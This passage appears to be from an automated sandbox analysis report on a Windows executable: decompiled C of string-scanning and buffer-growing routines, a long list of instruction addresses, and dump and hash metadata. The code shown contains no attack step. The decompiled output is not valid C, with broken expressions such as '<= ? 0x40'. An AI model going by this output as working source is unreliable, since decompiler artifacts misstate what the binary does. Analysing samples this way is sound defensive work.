												asm("movdqu xmm1, [esi+ecx]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb edx, xmm1");
												if(_t438 != 0) {
													break;
												}
												_t359 = _t359 + 0x10;
												if(_t359 < _t512) {
													continue;
												} else {
													if(_t512 >= 0x7fffffff) {
														L140:
														_t512 = 0x7fffffff;
													} else {
														while( *((char*)(_t512 + _t524)) != 0) {
															_t512 = _t512 + 1;
															if(_t512 < 0x7fffffff) {
																continue;
															} else {
																goto L140;
															}
															goto L141;
														}
														goto L230;
													}
												}
												goto L141;
											}
											asm("bsf edi, edx");
											_t512 = _t512 + _t359;
											goto L230;
										} else {
											_t512 = 0;
											_t359 =  ~_t359 + 0x10;
											while( *((char*)(_t512 + _t524)) != 0) {
												_t512 = _t512 + 1;
												if(_t512 < _t359) {
													continue;
												} else {
													goto L134;
												}
												goto L141;
											}
											L230:
											if(_t512 == 0xffffffff) {
												_t456 =  *_t308;
												if(_t456 != 0) {
													 *_t456 = 0;
												}
											}
										}
										L141:
										_t171 = _t512 + 1; // 0x80000000
										_t361 =  <=  ? 0x40 : _t171;
										if(_t361 >  *((intOrPtr*)(_t308 + 4))) {
											_v64 = (_t361 >> 5 >> 0x1a) + _t361 >> 6;
											_t362 = _t361 & 0x8000003f;
											if(_t362 < 0) {
												_t362 = (_t362 - 0x00000001 | 0xffffffc0) + 1;
											}
											_t365 = _v64 + (0 | _t362 > 0x00000000) << 6;
											_v64 = _t365;
											_push(_t365);
											_t353 = E00411030();
											_t553 = _t553 + 4;
											_t293 =  *_t308;
											if(_t293 == 0) {
												 *_t353 = 0;
											} else {
												if(_t353 != 0) {
													_t452 =  *_t293;
													 *_t353 = _t452;
													if(_t452 != 0) {
														_v68 = _t524;
														_v24 = _t308;
														_t314 = 0;
														while(1) {
															_t314 = _t314 + 1;
															_t454 =  *((char*)(_t293 + _t314 * 2 - 1));
															 *((char*)(_t353 + _t314 * 2 - 1)) = _t454;
															if(_t454 == 0) {
																break;
															}
															_t455 =  *((char*)(_t293 + _t314 * 2));
															 *((char*)(_t353 + _t314 * 2)) = _t455;
															if(_t455 != 0) {
																continue;
															}
															break;
														}
														_t524 = _v68;
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t293);
												_v68 = _t353;
												E004110B0();
												_t353 = _v68;
												_t553 = _t553 + 8;
											}
											 *((intOrPtr*)(_t308 + 4)) = _v64;
											 *_t308 = _t353;
										} else {
											_t353 =  *_t308;
										}
										_t294 = _t524;
										if(_t353 != 0 && _t524 != 0) {
											_v24 = _t308;
											_t451 = 0;
											_t313 = _t294;
											while(1) {
												_t295 =  *_t313;
												_t451 = _t451 + 1;
												 *_t353 = _t295;
												if(_t512 != 0 && _t451 == _t512) {
													break;
												}
												if(_t295 == 0) {
													L229:
													_t308 = _v24;
												} else {
													_t353 = _t353 + 1;
													_t313 = _t313 + 1;
													continue;
												}
												goto L226;
											}
											L228:
											_t308 = _v24;
											 *((char*)(_t353 + 1)) = 0;
										}
									}
									L226:
									_push(1);
									_push(_t524);
									E004110B0();
									_push(1);
									_push(_v44);
									E004110B0();
									_v44 = 0;
									_v40 = 0;
									return _t308;
								} else {
									_push( &_v56);
									_push(_t506);
									_push(0x200);
									_push(_t524);
									asm("int3");
									return _t287;
								}
							}
						}
					}
				}
				L30:
				_t34 = _t520 + 2; // -2147483660
				_t389 =  <=  ? 0x40 : _t34;
				if(_t322 < _t389) {
					_t327 = (_t389 >> 5 >> 0x1a) + _t389 >> 6;
					_v60 = _t327;
					_t390 = _t389 & 0x8000003f;
					if(_t390 < 0) {
						_t390 = (_t390 - 0x00000001 | 0xffffffc0) + 1;
					}
					_t329 = _t327 + (0 | _t390 > 0x00000000) << 6;
					_v60 = _t329;
					_push(_t329);
					_t266 = E00411030();
					_t552 = _t552 + 4;
					_t330 = _v44;
					if(_t330 == 0) {
						 *_t266 = 0;
					} else {
						if(_t266 != 0) {
							_t482 =  *_t330;
							 *_t266 = _t482;
							if(_t482 != 0) {
								_v24 = _t306;
								_t318 = 0;
								_v68 = _t496;
								while(1) {
									_t318 = _t318 + 1;
									_t484 =  *((char*)(_t330 + _t318 * 2 - 1));
									 *((char*)(_t266 + _t318 * 2 - 1)) = _t484;
									if(_t484 == 0) {
										break;
									}
									_t485 =  *((char*)(_t330 + _t318 * 2));
									 *((char*)(_t266 + _t318 * 2)) = _t485;
									if(_t485 != 0) {
										continue;
									}
									break;
								}
								_t306 = _v24;
								_t496 = _v68;
							}
						}
						_push(1);
						_push(_t330);
						_v64 = _t266;
						E004110B0();
						_t266 = _v64;
						_t552 = _t552 + 8;
					}
					_v40 = _v60;
					_v44 = _t266;
				} else {
					_t266 = _v44;
				}
				 *((char*)(_t266 + _t520)) = 0x25;
				 *((char*)(_t520 + _v44 + 1)) = 0;
				if(_a4 != 0) {
					_t395 = _v44;
					if(_t395 == 0) {
						_t521 = 0;
					} else {
						_t381 = _t395 & 0x0000000f;
						if(_t381 == 0) {
							L51:
							asm("pxor xmm0, xmm0");
							_t543 =  ~( ~_t381 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [edx+ecx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								if(_t266 != 0) {
									break;
								}
								_t381 = _t381 + 0x10;
								if(_t381 < _t543) {
									continue;
								} else {
									if(_t543 >= 0x7fffffff) {
										L57:
										_t521 = 0x7fffffff;
									} else {
										while( *((char*)(_t543 + _t395)) != 0) {
											_t543 = _t543 + 1;
											if(_t543 < 0x7fffffff) {
												continue;
											} else {
												goto L57;
											}
											goto L58;
										}
										goto L246;
									}
								}
								goto L58;
							}
							asm("bsf esi, eax");
							_t521 = _t543 + _t381;
							goto L246;
						} else {
							_t521 = 0;
							_t381 =  ~_t381 + 0x10;
							while( *((char*)(_t521 + _t395)) != 0) {
								_t521 = _t521 + 1;
								if(_t521 < _t381) {
									continue;
								} else {
									goto L51;
								}
								goto L58;
							}
							L246:
							if(_t521 == 0xfffffffe) {
								 *_t395 = 0;
							}
						}
					}
					L58:
					_t332 =  <=  ? 0x40 : _t521 + 2;
					if(_t332 > _v40) {
						_v60 = (_t332 >> 5 >> 0x1a) + _t332 >> 6;
						_t333 = _t332 & 0x8000003f;
						if(_t333 < 0) {
							_t333 = (_t333 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t336 = _v60 + (0 | _t333 > 0x00000000) << 6;
						_v60 = _t336;
						_push(_t336);
						_t267 = E00411030();
						_t552 = _t552 + 4;
						_t332 = _v44;
						if(_t332 == 0) {
							 *_t267 = 0;
						} else {
							if(_t267 != 0) {
								_t478 =  *_t332;
								 *_t267 = _t478;
								if(_t478 != 0) {
									_v24 = _t306;
									_t317 = 0;
									_v68 = _t496;
									while(1) {
										_t317 = _t317 + 1;
										_t480 =  *((char*)(_t332 + _t317 * 2 - 1));
										 *((char*)(_t267 + _t317 * 2 - 1)) = _t480;
										if(_t480 == 0) {
											break;
										}
										_t481 =  *((char*)(_t332 + _t317 * 2));
										 *((char*)(_t267 + _t317 * 2)) = _t481;
										if(_t481 != 0) {
											continue;
										}
										break;
									}
									_t306 = _v24;
									_t496 = _v68;
								}
							}
							_push(1);
							_push(_t332);
							_v64 = _t267;
							E004110B0();
							_t267 = _v64;
							_t552 = _t552 + 8;
						}
						_v40 = _v60;
						_v44 = _t267;
					} else {
						_t267 = _v44;
					}
					 *((char*)(_t267 + _t521)) = 0x30;
					 *((char*)(_t521 + _v44 + 1)) = 0;
					_t268 = _v44;
					if(_t268 == 0) {
						_t522 = 0;
					} else {
						_t476 = _t268 & 0x0000000f;
						if(_t476 == 0) {
							L77:
							asm("pxor xmm0, xmm0");
							_t537 =  ~( ~_t476 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [eax+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								if(_t332 != 0) {
									break;
								}
								_t476 = _t476 + 0x10;
								if(_t476 < _t537) {
									continue;
								} else {
									if(_t537 >= 0x7fffffff) {
										L83:
										_t522 = 0x7fffffff;
									} else {
										while( *((char*)(_t537 + _t268)) != 0) {
											_t537 = _t537 + 1;
											if(_t537 < 0x7fffffff) {
												continue;
											} else {
												goto L83;
											}
											goto L84;
										}
										goto L242;
									}
								}
								goto L84;
							}
							asm("bsf esi, ecx");
							_t522 = _t537 + _t476;
							goto L242;
						} else {
							_t522 = 0;
							_t476 =  ~_t476 + 0x10;
							while( *((char*)(_t522 + _t268)) != 0) {
								_t522 = _t522 + 1;
								if(_t522 < _t476) {
									continue;
								} else {
									goto L77;
								}
								goto L84;
							}
							L242:
							if(_t522 == 0xfffffffe) {
								 *_t268 = 0;
							}
						}
					}
					L84:
					_t330 = 0x40;
					_t407 =  <=  ? 0x40 : _t522 + 2;
					if(_t407 > _v40) {
						_t375 = (_t407 >> 5 >> 0x1a) + _t407 >> 6;
						_v60 = _t375;
						_t465 = _t407 & 0x8000003f;
						if(_t465 < 0) {
							_t465 = (_t465 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t377 = _t375 + (0 | _t465 > 0x00000000) << 6;
						_v60 = _t377;
						_push(_t377);
						_t268 = E00411030();
						_t552 = _t552 + 4;
						_t330 = _v44;
						if(_t330 == 0) {
							 *_t268 = 0;
						} else {
							if(_t268 != 0) {
								_t469 =  *_t330;
								 *_t268 = _t469;
								if(_t469 != 0) {
									_v24 = _t306;
									_t316 = 0;
									_v68 = _t496;
									while(1) {
										_t316 = _t316 + 1;
										_t471 =  *((char*)(_t330 + _t316 * 2 - 1));
										 *((char*)(_t268 + _t316 * 2 - 1)) = _t471;
										if(_t471 == 0) {
											break;
										}
										_t472 =  *((char*)(_t330 + _t316 * 2));
										 *((char*)(_t268 + _t316 * 2)) = _t472;
										if(_t472 != 0) {
											continue;
										}
										break;
									}
									_t306 = _v24;
									_t496 = _v68;
									_t330 = _v44;
								}
							}
							_push(1);
							_push(_t330);
							_v64 = _t268;
							E004110B0();
							_t268 = _v64;
							_t552 = _t552 + 8;
						}
						_v40 = _v60;
						_v44 = _t268;
					}
					 *((char*)(_t268 + _t522)) = 0x2a;
					 *((char*)(_t268 + _t522 + 1)) = 0;
				} else {
					_t268 = _v44;
				}
				if(_t268 == 0) {
					_t523 = 0;
				} else {
					_t463 = _t268 & 0x0000000f;
					if(_t463 == 0) {
						L103:
						asm("pxor xmm0, xmm0");
						_t531 =  ~( ~_t463 + 0x0000000f & 0x0000000f) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [eax+edx]");
							asm("pcmpeqb xmm1, xmm0");
							asm("pmovmskb ecx, xmm1");
							if(_t330 != 0) {
								break;
							}
							_t463 = _t463 + 0x10;
							if(_t463 < _t531) {
								continue;
							} else {
								if(_t531 >= 0x7fffffff) {
									L109:
									_t523 = 0x7fffffff;
								} else {
									while( *((char*)(_t531 + _t268)) != 0) {
										_t531 = _t531 + 1;
										if(_t531 < 0x7fffffff) {
											continue;
										} else {
											goto L109;
										}
										goto L110;
									}
									goto L238;
								}
							}
							goto L110;
						}
						asm("bsf esi, ecx");
						_t523 = _t531 + _t463;
						goto L238;
					} else {
						_t523 = 0;
						_t463 =  ~_t463 + 0x10;
						while( *((char*)(_t523 + _t268)) != 0) {
							_t523 = _t523 + 1;
							if(_t523 < _t463) {
								continue;
							} else {
								goto L103;
							}
							goto L110;
						}
						L238:
						if(_t523 == 0xfffffffe) {
							 *_t268 = 0;
						}
					}
				}
				L110:
				_t338 =  <=  ? 0x40 : _t523 + 2;
				if(_t338 > _v40) {
					_v64 = (_t338 >> 5 >> 0x1a) + _t338 >> 6;
					_t339 = _t338 & 0x8000003f;
					if(_t339 < 0) {
						_t339 = (_t339 - 0x00000001 | 0xffffffc0) + 1;
					}
					_t342 = _v64 + (0 | _t339 > 0x00000000) << 6;
					_v64 = _t342;
					_push(_t342);
					_t269 = E00411030();
					_t552 = _t552 + 4;
					_t343 = _v44;
					if(_t343 == 0) {
						 *_t269 = 0;
					} else {
						if(_t269 != 0) {
							_t458 =  *_t343;
							 *_t269 = _t458;
							if(_t458 != 0) {
								_v24 = _t306;
								_t315 = 0;
								_v68 = _t496;
								while(1) {
									_t315 = _t315 + 1;
									_t460 =  *((char*)(_t343 + _t315 * 2 - 1));
									 *((char*)(_t269 + _t315 * 2 - 1)) = _t460;
									if(_t460 == 0) {
										break;
									}
									_t461 =  *((char*)(_t343 + _t315 * 2));
									 *((char*)(_t269 + _t315 * 2)) = _t461;
									if(_t461 != 0) {
										continue;
									}
									break;
								}
								_t306 = _v24;
								_t496 = _v68;
							}
						}
						_push(1);
						_push(_t343);
						_v68 = _t269;
						E004110B0();
						_t269 = _v68;
						_t552 = _t552 + 8;
					}
					_v40 = _v64;
					_v44 = _t269;
				} else {
					_t269 = _v44;
				}
				goto L124;
			}

0x004262fc
0x004262fe
0x00426300
0x00426304
0x00426306
0x0042630e
0x00426310
0x00426313
0x00426317
0x00426354
0x00426319
0x0042631b
0x0042631d
0x00426320
0x00426324
0x00426326
0x00426329
0x0042632b
0x0042632b
0x0042632c
0x00426331
0x00426337
0x00000000
0x00000000
0x00426339
0x0042633d
0x00426342
0x00000000
0x00000000
0x00000000
0x00426342
0x00426344
0x00426344
0x00426324
0x00426347
0x00426349
0x0042634a
0x0042634f
0x0042634f
0x0042635c
0x00426364
0x00426365
0x00426367
0x0042636a
0x0042636f
0x00426372
0x00426378
0x004263d5
0x004263d8
0x004263e0
0x00000000
0x0042637a
0x0042637c
0x00426dc0
0x00426dc2
0x00426dc3
0x00426dc8
0x00426dcb
0x00426dd3
0x00426dd5
0x00000000
0x00426382
0x00426382
0x00426385
0x00426389
0x0042638b
0x00426393
0x00426395
0x00426398
0x00426398
0x00426399
0x0042639e
0x004263a4
0x00000000
0x00000000
0x004263a6
0x004263aa
0x004263af
0x00000000
0x00000000
0x00000000
0x004263af
0x004263b1
0x004263b1
0x004263b4
0x004263b6
0x004263b7
0x004263bb
0x004263c0
0x004263c4
0x004263c7
0x004263cf
0x004263e4
0x004263e6
0x004263e9
0x00426401
0x00426405
0x00426411
0x00426417
0x00426417
0x0042641c
0x00426420
0x00426426
0x00000000
0x00000000
0x0042642c
0x00426431
0x00000000
0x00426433
0x00426439
0x0042644e
0x0042644e
0x00000000
0x0042643b
0x0042643b
0x00426445
0x0042644c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042644c
0x00000000
0x0042643b
0x00426439
0x00000000
0x00426431
0x00426eb0
0x00426eb3
0x00000000
0x004263eb
0x004263ed
0x004263ef
0x004263f2
0x004263fc
0x004263ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004263ff
0x00426e93
0x00426e96
0x00426453
0x00426453
0x00426ea4
0x00426ea4
0x00426ea7
0x00426ea7
0x00000000
0x004268ea
0x004268ea
0x004268ee
0x004268f6
0x004268fb
0x00426b4d
0x00426b51
0x00426b55
0x00426b59
0x00426b63
0x00426b65
0x00426b6d
0x00426b7d
0x00426b84
0x00426baf
0x00426bb5
0x00426d25
0x00426d29
0x00426d2b
0x00426d2b
0x00426d32
0x00426d34
0x00426d3b
0x00426d3d
0x00426d40
0x00426d44
0x00426d83
0x00426d46
0x00426d48
0x00426d4a
0x00426d4d
0x00426d51
0x00426d53
0x00426d57
0x00426d59
0x00426d59
0x00426d5a
0x00426d5f
0x00426d65
0x00000000
0x00000000
0x00426d67
0x00426d6b
0x00426d70
0x00000000
0x00000000
0x00000000
0x00426d70
0x00426d72
0x00426d72
0x00426d51
0x00426d76
0x00426d78
0x00426d79
0x00426d7e
0x00426d7e
0x00000000
0x00426d44
0x00426bc4
0x00426bc6
0x00426bc9
0x00426be1
0x00426be5
0x00426bf1
0x00426bf7
0x00426bf7
0x00426bfc
0x00426c00
0x00426c06
0x00000000
0x00000000
0x00426c0c
0x00426c11
0x00000000
0x00426c13
0x00426c19
0x00426c2e
0x00426c2e
0x00426c1b
0x00426c1b
0x00426c25
0x00426c2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00426c2c
0x00000000
0x00426c1b
0x00426c19
0x00000000
0x00426c11
0x00426e2f
0x00426e32
0x00000000
0x00426bcb
0x00426bcd
0x00426bcf
0x00426bd2
0x00426bdc
0x00426bdf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00426bdf
0x00426e14
0x00426e17
0x00426e1d
0x00426e21
0x00426e27
0x00426e27
0x00426e21
0x00426e17
0x00426c33
0x00426c38
0x00426c3e
0x00426c44
0x00426c5a
0x00426c5e
0x00426c64
0x00426c6c
0x00426c6c
0x00426c7a
0x00426c7d
0x00426c81
0x00426c87
0x00426c89
0x00426c8c
0x00426c90
0x00426cdf
0x00426c92
0x00426c94
0x00426c96
0x00426c99
0x00426c9d
0x00426ca1
0x00426ca4
0x00426ca8
0x00426caa
0x00426caa
0x00426cab
0x00426cb0
0x00426cb6
0x00000000
0x00000000
0x00426cb8
0x00426cbc
0x00426cc1
0x00000000
0x00000000
0x00000000
0x00426cc1
0x00426cc3
0x00426cc6
0x00426cc6
0x00426c9d
0x00426cca
0x00426ccc
0x00426ccd
0x00426cd1
0x00426cd6
0x00426cda
0x00426cda
0x00426ce6
0x00426ce9
0x00426c46
0x00426c46
0x00426c46
0x00426ceb
0x00426cef
0x00426cfd
0x00426d01
0x00426d03
0x00426d09
0x00426d09
0x00426d0c
0x00426d0d
0x00426d11
0x00000000
0x00000000
0x00426d1d
0x00000000
0x00426d23
0x00426d07
0x00426d08
0x00000000
0x00426d08
0x00000000
0x00426d1d
0x00000000
0x00426d09
0x00426cef
0x00000000
0x00426b86
0x00426b8a
0x00426b8b
0x00426b8c
0x00426b8d
0x00426b8e
0x00426b8f
0x00426b8f
0x00426901
0x00426901
0x00426905
0x00426908
0x0042690c
0x00426910
0x00426914
0x0042691e
0x00426920
0x00426928
0x00426938
0x0042693f
0x0042696a
0x00426970
0x00426ae0
0x00426ae4
0x00426ae6
0x00426ae6
0x00426aed
0x00426af3
0x00426afa
0x00426afc
0x00426aff
0x00426b03
0x00426b45
0x00426b05
0x00426b07
0x00426b09
0x00426b0c
0x00426b10
0x00426b12
0x00426b16
0x00426b18
0x00426b18
0x00426b19
0x00426b1e
0x00426b24
0x00000000
0x00000000
0x00426b26
0x00426b2a
0x00426b2f
0x00000000
0x00000000
0x00000000
0x00426b2f
0x00426b31
0x00426b31
0x00426b10
0x00426b35
0x00426b37
0x00426b38
0x00426b3d
0x00426b3d
0x00426d86
0x00426d86
0x00426d88
0x00426d88
0x0042697f
0x00426981
0x00426984
0x0042699c
0x004269a0
0x004269ac
0x004269b2
0x004269b2
0x004269b7
0x004269bb
0x004269c1
0x00000000
0x00000000
0x004269c7
0x004269cc
0x00000000
0x004269ce
0x004269d4
0x004269e9
0x004269e9
0x004269d6
0x004269d6
0x004269e0
0x004269e7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004269e7
0x00000000
0x004269d6
0x004269d4
0x00000000
0x004269cc
0x00426e0d
0x00426e10
0x00000000
0x00426986
0x00426988
0x0042698a
0x0042698d
0x00426997
0x0042699a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042699a
0x00426df2
0x00426df5
0x00426dfb
0x00426dff
0x00426e05
0x00426e05
0x00426dff
0x00426df5
0x004269ee
0x004269f3
0x004269f9
0x004269ff
0x00426a15
0x00426a19
0x00426a1f
0x00426a27
0x00426a27
0x00426a35
0x00426a38
0x00426a3c
0x00426a42
0x00426a44
0x00426a47
0x00426a4b
0x00426a9a
0x00426a4d
0x00426a4f
0x00426a51
0x00426a54
0x00426a58
0x00426a5c
0x00426a5f
0x00426a63
0x00426a65
0x00426a65
0x00426a66
0x00426a6b
0x00426a71
0x00000000
0x00000000
0x00426a73
0x00426a77
0x00426a7c
0x00000000
0x00000000
0x00000000
0x00426a7c
0x00426a7e
0x00426a81
0x00426a81
0x00426a58
0x00426a85
0x00426a87
0x00426a88
0x00426a8c
0x00426a91
0x00426a95
0x00426a95
0x00426aa1
0x00426aa4
0x00426a01
0x00426a01
0x00426a01
0x00426aa6
0x00426aaa
0x00426ab8
0x00426abc
0x00426abe
0x00426ac4
0x00426ac4
0x00426ac7
0x00426ac8
0x00426acc
0x00000000
0x00000000
0x00426ad8
0x00426dec
0x00426dec
0x00426ade
0x00426ac2
0x00426ac3
0x00000000
0x00426ac3
0x00000000
0x00426ad8
0x00426de2
0x00426de2
0x00426de6
0x00426de6
0x00426aaa
0x00426d8f
0x00426d8f
0x00426d91
0x00426d92
0x00426d9a
0x00426d9c
0x00426da0
0x00426dac
0x00426db0
0x00426dbd
0x00426941
0x00426945
0x00426946
0x00426947
0x00426948
0x00426949
0x0042694a
0x0042694a
0x0042693f
0x004268fb
0x004263e9
0x0042637c
0x00426458
0x0042645d
0x00426463
0x00426468
0x0042647d
0x00426480
0x00426484
0x0042648a
0x00426492
0x00426492
0x0042649f
0x004264a2
0x004264a6
0x004264a7
0x004264ac
0x004264af
0x004264b5
0x00426504
0x004264b7
0x004264b9
0x004264bb
0x004264be
0x004264c2
0x004264c6
0x004264ca
0x004264cc
0x004264cf
0x004264cf
0x004264d0
0x004264d5
0x004264db
0x00000000
0x00000000
0x004264dd
0x004264e1
0x004264e6
0x00000000
0x00000000
0x00000000
0x004264e6
0x004264e8
0x004264ec
0x004264ec
0x004264c2
0x004264ef
0x004264f1
0x004264f2
0x004264f6
0x004264fb
0x004264ff
0x004264ff
0x0042650b
0x0042650f
0x0042646a
0x0042646a
0x0042646a
0x00426513
0x0042651f
0x00426524
0x0042652f
0x00426535
0x00426e8c
0x0042653b
0x0042653d
0x00426540
0x00426558
0x0042655c
0x00426568
0x0042656e
0x0042656e
0x00426573
0x00426577
0x0042657d
0x00000000
0x00000000
0x00426583
0x00426588
0x00000000
0x0042658a
0x00426590
0x004265a5
0x004265a5
0x00426592
0x00426592
0x0042659c
0x004265a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004265a3
0x00000000
0x00426592
0x00426590
0x00000000
0x00426588
0x00426e85
0x00426e88
0x00000000
0x00426542
0x00426544
0x00426546
0x00426549
0x00426553
0x00426556
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00426556
0x00426e74
0x00426e77
0x00426e7d
0x00426e7d
0x00426e77
0x00426540
0x004265aa
0x004265b5
0x004265bc
0x004265d4
0x004265d8
0x004265de
0x004265e6
0x004265e6
0x004265f4
0x004265f7
0x004265fb
0x004265fc
0x00426601
0x00426604
0x0042660a
0x00426659
0x0042660c
0x0042660e
0x00426610
0x00426613
0x00426617
0x0042661b
0x0042661f
0x00426621
0x00426624
0x00426624
0x00426625
0x0042662a
0x00426630
0x00000000
0x00000000
0x00426632
0x00426636
0x0042663b
0x00000000
0x00000000
0x00000000
0x0042663b
0x0042663d
0x00426641
0x00426641
0x00426617
0x00426644
0x00426646
0x00426647
0x0042664b
0x00426650
0x00426654
0x00426654
0x00426660
0x00426664
0x004265be
0x004265be
0x004265be
0x00426668
0x00426670
0x00426675
0x0042667b
0x00426e6d
0x00426681
0x00426683
0x00426686
0x0042669e
0x004266a2
0x004266ae
0x004266b4
0x004266b4
0x004266b9
0x004266bd
0x004266c3
0x00000000
0x00000000
0x004266c9
0x004266ce
0x00000000
0x004266d0
0x004266d6
0x004266eb
0x004266eb
0x004266d8
0x004266d8
0x004266e2
0x004266e9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004266e9
0x00000000
0x004266d8
0x004266d6
0x00000000
0x004266ce
0x00426e66
0x00426e69
0x00000000
0x00426688
0x0042668a
0x0042668c
0x0042668f
0x00426699
0x0042669c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042669c
0x00426e55
0x00426e58
0x00426e5e
0x00426e5e
0x00426e58
0x00426686
0x004266f0
0x004266f0
0x004266fb
0x00426702
0x00426712
0x00426715
0x00426719
0x0042671f
0x00426727
0x00426727
0x00426734
0x00426737
0x0042673b
0x0042673c
0x00426741
0x00426744
0x0042674a
0x0042679d
0x0042674c
0x0042674e
0x00426750
0x00426753
0x00426757
0x0042675b
0x0042675f
0x00426761
0x00426764
0x00426764
0x00426765
0x0042676a
0x00426770
0x00000000
0x00000000
0x00426772
0x00426776
0x0042677b
0x00000000
0x00000000
0x00000000
0x0042677b
0x0042677d
0x00426781
0x00426784
0x00426784
0x00426757
0x00426788
0x0042678a
0x0042678b
0x0042678f
0x00426794
0x00426798
0x00426798
0x004267a4
0x004267a8
0x004267a8
0x004267ac
0x004267b0
0x00426526
0x00426526
0x00426526
0x004267b7
0x00426e4e
0x004267bd
0x004267bf
0x004267c2
0x004267da
0x004267de
0x004267ea
0x004267f0
0x004267f0
0x004267f5
0x004267f9
0x004267ff
0x00000000
0x00000000
0x00426805
0x0042680a
0x00000000
0x0042680c
0x00426812
0x00426827
0x00426827
0x00426814
0x00426814
0x0042681e
0x00426825
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00426825
0x00000000
0x00426814
0x00426812
0x00000000
0x0042680a
0x00426e47
0x00426e4a
0x00000000
0x004267c4
0x004267c6
0x004267c8
0x004267cb
0x004267d5
0x004267d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004267d8
0x00426e36
0x00426e39
0x00426e3f
0x00426e3f
0x00426e39
0x004267c2
0x0042682c
0x00426837
0x0042683e
0x00426856
0x0042685a
0x00426860
0x00426868
0x00426868
0x00426876
0x00426879
0x0042687d
0x0042687e
0x00426883
0x00426886
0x0042688c
0x004268db
0x0042688e
0x00426890
0x00426892
0x00426895
0x00426899
0x0042689d
0x004268a1
0x004268a3
0x004268a6
0x004268a6
0x004268a7
0x004268ac
0x004268b2
0x00000000
0x00000000
0x004268b4
0x004268b8
0x004268bd
0x00000000
0x00000000
0x00000000
0x004268bd
0x004268bf
0x004268c3
0x004268c3
0x00426899
0x004268c6
0x004268c8
0x004268c9
0x004268cd
0x004268d2
0x004268d6
0x004268d6
0x004268e2
0x004268e6
0x00426840
0x00426840
0x00426840
0x00000000

Strings

@, xrefs: 00426DCB

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 69f4932f4811ef0fb6fd8a04132b56a00089e99660f0bfd3f341bf26684d656a
Instruction ID: ce49fa6c67c8d37914eb774f471bc5025818b042c1a7a1c7f0e5b17887ee5b15
Opcode Fuzzy Hash: 69f4932f4811ef0fb6fd8a04132b56a00089e99660f0bfd3f341bf26684d656a
Instruction Fuzzy Hash: EE727D74B083A14BD719CF39E49032B7AD26FD6304F6AC25ED8950B396DA3D8C41C78A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C590, Relevance: 2.1, Strings: 1, Instructions: 878
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0041C590(signed int* __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed short* _t304;
				unsigned int _t312;
				signed int _t313;
				signed short** _t319;
				signed short* _t323;
				signed int* _t325;
				signed int _t330;
				signed int _t334;
				signed int _t338;
				unsigned int _t340;
				unsigned int _t341;
				signed int _t343;
				unsigned int _t344;
				signed int _t345;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t357;
				signed int _t360;
				unsigned int _t366;
				signed int _t367;
				void* _t373;
				signed int _t376;
				signed int _t377;
				unsigned int _t383;
				unsigned int _t384;
				signed int _t386;
				signed int _t387;
				signed int _t395;
				signed int _t396;
				signed int _t398;
				signed int* _t405;
				signed int _t406;
				signed int _t412;
				signed int _t418;
				signed int _t421;
				signed int _t426;
				signed int _t432;
				signed int _t434;
				signed int _t441;
				signed int _t443;
				signed int _t449;
				signed int _t452;
				signed int _t457;
				signed int _t459;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t469;
				signed int _t476;
				signed int _t479;
				signed int _t480;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				void* _t493;
				signed int _t494;
				signed int _t495;
				signed int _t498;
				intOrPtr* _t500;
				signed int _t501;
				signed int _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t508;
				signed int _t510;
				signed int _t513;
				signed int _t518;
				void* _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				void* _t523;
				signed int _t524;
				signed int _t525;
				signed int _t528;
				signed int* _t529;
				signed int _t530;
				signed int _t534;
				signed int _t537;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t552;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t559;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t570;
				signed int _t571;
				signed int _t574;
				signed int _t581;
				signed short* _t582;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				signed int _t593;
				intOrPtr* _t594;
				signed int _t595;
				signed short* _t596;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t609;
				signed int _t611;
				signed int* _t614;

				_v64 = 0;
				_t405 = __ecx;
				_v60 = 0;
				_push(0x80);
				_t551 = E00411030();
				_t614 = (_t611 & 0xfffffff0) - 0x34 + 4;
				_t304 = _v64;
				if(_t304 == 0) {
					__eflags = 0;
					 *_t551 = 0;
					L8:
					_v60 = 0x40;
